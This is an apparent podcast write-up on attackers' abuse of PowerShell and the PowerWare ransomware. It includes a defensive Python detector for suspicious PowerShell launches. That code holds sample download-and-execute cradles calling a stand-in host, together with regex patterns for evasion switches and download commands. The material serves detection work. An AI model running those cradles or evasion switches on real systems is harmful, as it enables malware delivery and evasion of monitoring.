Talking PowerShell and Stealth Attacks with Carbon Black’s Rico Valdez

Malicious actors are increasingly using legitimate tools such as PowerShell to lessen their digital footprint and evade detection, and because that technology is both ubiquitous and legitimate, defending against such threats is a problem for organizations.

That’s according to Carbon Black senior security researcher Rico Valdez, who joined us for this week’s Cyber Chat podcast to discuss recent research on PowerShell, including a new report examining more than 1,100 security investigations in 2015.

Windows PowerShell is an automation platform and scripting language that Microsoft describes as “providing a massive set of built-in functionality for taking control of your Windows environments.”

That legitimate use, combined with the built-in functionality, makes it a perfect tool for attackers to abuse.

“It used to be the kind of thing where only really sophisticated adversaries would use it, but it’s gotten to the point now where it’s being incorporated in a lot of commodity malware,” Valdez said. “It’s another way to stay under the radar and try to remain undetected.”

Using PowerShell fits the overall trend of attackers avoiding dropping a lot of tools onto a system; instead, they use what is already there to further their goals.

“Monitoring it can be very tricky,” Valdez said. “I don’t think it’s very well understood even by the larger SOCs (security operations centers). It’s one of those things that’s a little bit further down on the list for a lot of these organizations to really dig into.”

How are criminals using PowerShell?

In data from a variety of incident response and MSSP partners, 38% of confirmed cyber incidents used PowerShell. That figure spans all industries and multiple attack campaigns.

PowerShell is used for a variety of malicious purposes, according to Carbon Black’s report.

“It’s quite powerful in that it can pretty much touch any part of the system, and if you’re running it with the right privileges it can pretty much do anything on the system,” Valdez said.

For example, last month a new family of ransomware was discovered dubbed “PowerWare.” PowerWare uses the popular technique of duping users via phishing messages containing a macro-enabled Microsoft Word document. The malicious macros then use PowerShell to further the attack.

Eighty-seven percent of the attacks leveraging PowerShell were commodity malware attacks such as ransomware, click fraud, fake antivirus, and others. Only 13% were described as “advanced” attacks.

This technique is a good example of how attacks tend to evolve, Valdez said. First they’re discovered by sophisticated actors and used in targeted attacks. Then — if they work well — they become mainstream.

“This is a real risk in your environment and you need to be aware of it, because, again, most people aren’t watching it, monitoring it, anything like that.”
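The two behaviours described above, an Office document spawning PowerShell (the PowerWare chain) and PowerShell launched with switches chosen to stay under the radar, are both visible in ordinary process-creation telemetry, which is the cheapest place to start the monitoring Valdez says most organizations skip. The following Python is an added example, not code from the article, the podcast or Carbon Black’s report. It runs that detection logic over a handful of constructed Sysmon-style records; the field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine), while the records, the example.invalid hostnames and the indicator names are invented for the example.

```python
"""Flag suspicious PowerShell launches in process-creation telemetry.

Added example, not code from the article or from Carbon Black. Field names
follow Sysmon Event ID 1 (ParentImage, Image, CommandLine); the records below
are constructed for this example and are not real telemetry.
"""
import base64
import ntpath
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

# powershell.exe accepts abbreviated switches; attackers favour the short forms.
EVASION_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "policy_bypass": re.compile(r"-e(?:p|x[a-z]*)\s+(?:bypass|unrestricted)\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
}

# Download-and-execute "cradles" commonly seen in macro-launched PowerShell.
CRADLE_PATTERN = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|"
    r"invoke-expression|\biex\b|start-bitstransfer|frombase64string",
    re.I,
)


def encode_command(script):
    """Build a -EncodedCommand argument the way PowerShell expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed.

    powershell.exe takes any unambiguous prefix of -EncodedCommand (-e, -ec,
    -enc, ...), so match on the prefix rather than the full switch name.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        name = tok.lstrip("-/").lower()
        if name and (name == "ec" or "encodedcommand".startswith(name)):
            try:
                raw = base64.b64decode(tokens[i + 1].strip("\"'"), validate=True)
                return raw.decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze_event(event):
    """Return the indicator names that fire on one process-creation record."""
    image = ntpath.basename(event.get("Image", "")).lower()
    if image not in POWERSHELL_IMAGES:
        return []
    findings = []
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent in OFFICE_PARENTS:
        findings.append("office_spawned_powershell")  # the PowerWare chain
    cmdline = event.get("CommandLine", "")
    findings += [name for name, pat in EVASION_PATTERNS.items() if pat.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded_command")
    # Check both the visible command line and the decoded payload for cradles.
    if CRADLE_PATTERN.search(cmdline + "\n" + (decoded or "")):
        findings.append("download_cradle")
    return findings


def triage(findings):
    """Crude priority: an Office parent or cradle-plus-encoding is the commodity-malware shape."""
    if "office_spawned_powershell" in findings or (
        "encoded_command" in findings and "download_cradle" in findings
    ):
        return "high"
    if "download_cradle" in findings or "policy_bypass" in findings:
        return "medium"
    return "low" if findings else "none"


# Constructed sample records (not real telemetry); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    # 1. PowerWare-style chain: a Word macro launches hidden, encoded PowerShell.
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand "
     + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')")},
    # 2. Downloader launched from cmd.exe: no encoding, but a plain cradle.
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
     ".DownloadFile('http://example.invalid/x.exe','C:\\Users\\Public\\x.exe')\""},
    # 3. Routine administration: scheduled script, nothing evasive.
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1"},
    # 4. Not PowerShell; must be ignored.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]

if __name__ == "__main__":
    for n, ev in enumerate(SAMPLE_EVENTS, 1):
        found = analyze_event(ev)
        print(f"event {n}: {triage(found):<6} {found}")
```

Two design points worth noting. The encoded-command check matches on any prefix of -EncodedCommand because powershell.exe accepts abbreviations, so a rule keyed only on the literal string "-EncodedCommand" misses "-enc" and "-e". And the cradle search runs over the decoded payload as well as the visible command line, since the whole point of encoding is that the visible line shows nothing but base64. Process-creation records are a first step only; PowerShell script block logging catches the script body once it is running, including code that never touches the command line.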

Listen to the full conversation with Carbon Black’s Rico Valdez for more about PowerShell and how organizations can protect themselves.

About the Podcast
A new ransomware family dubbed PowerWare, which targets organizations via Microsoft Word and PowerShell, was recently discovered, and just last week Carbon Black released a report looking at how PowerShell is being used for malicious intent. They wrote in the report that “the discovery of using PowerShell in attacks such as PowerWare is part of a larger, worrisome trend when it comes to PowerShell.”

On today’s Cyber Chat we talk with Carbon Black senior security researcher Rico Valdez about the company’s recent findings and how cybercriminals are increasingly using PowerShell to remain under the radar while targeting organizations.


Author: Jeff Peters

SurfWatch Labs editor and host of SurfWatch Labs Cyber Chat podcast. Focused on using threat intelligence and data visualization in order to bring cybercrime to life and help make organizations safer.
